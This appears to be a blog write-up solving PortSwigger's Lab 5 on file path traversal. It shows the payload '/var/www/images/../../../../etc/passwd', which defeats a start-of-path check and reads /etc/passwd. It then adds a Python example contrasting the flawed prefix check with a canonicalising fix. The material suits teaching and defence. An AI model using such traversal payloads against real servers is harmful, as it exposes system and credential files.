
PortSwigger - Directory Traversal - Lab 5

Lab 5 - Directory Traversal - File path traversal, validation of start of path

Lab Objective:

This lab contains a path traversal vulnerability in the display of product images. The application transmits the full file path via a request parameter, and validates that the supplied path starts with the expected folder.

To solve the lab, retrieve the contents of the /etc/passwd file.

Reference:
PortSwigger - Lab 5
Rana Khalil - Lab 5

Solution


1. Inspect the client's default image request and notice that the filename parameter always begins with /var/www/images; this is the prefix the server checks.

2. Append the traversal payload after /var/www/images, so the parameter still starts with the expected folder but resolves outside it:

../../../../etc/passwd
/var/www/images/../../../../etc/passwd
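Why the check fails, as an added example that is not part of the original write-up or of the lab's own code: a prefix check on the raw string passes the traversal payload above, while a check done after canonicalising the path rejects it. IMAGE_ROOT and the function names are assumptions chosen for the illustration.

```python
import posixpath
from typing import Optional

# Folder the lab application expects every image path to start with (assumed name).
IMAGE_ROOT = "/var/www/images"


def prefix_check(path: str) -> bool:
    """The lab's validation as described: accept any path that merely
    starts with the expected folder. A '../' sequence after the prefix
    still passes because the string is never resolved."""
    return path.startswith(IMAGE_ROOT + "/")


def canonical_check(path: str) -> bool:
    """Hardened variant: resolve '.', '..' and repeated slashes first,
    then require the resolved path to lie inside IMAGE_ROOT.
    posixpath is used so the example behaves the same on any OS; on a
    real server also resolve symlinks (os.path.realpath) before comparing."""
    resolved = posixpath.normpath(path)
    return resolved.startswith(IMAGE_ROOT + "/")


def resolve_image(path: str) -> Optional[str]:
    """What a fixed handler would do: return the canonical path to open,
    or None when the request escapes the image folder."""
    if not canonical_check(path):
        return None
    return posixpath.normpath(path)


if __name__ == "__main__":
    payload = "/var/www/images/../../../../etc/passwd"  # the lab's final parameter value
    print("prefix check  :", prefix_check(payload))     # True  (vulnerable)
    print("canonical     :", canonical_check(payload))  # False (blocked)
    print("resolves to   :", posixpath.normpath(payload))
```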

[Screenshot: Directory Traversal - Lab 5 - Start of path]


This post is licensed under CC BY 4.0 by the author.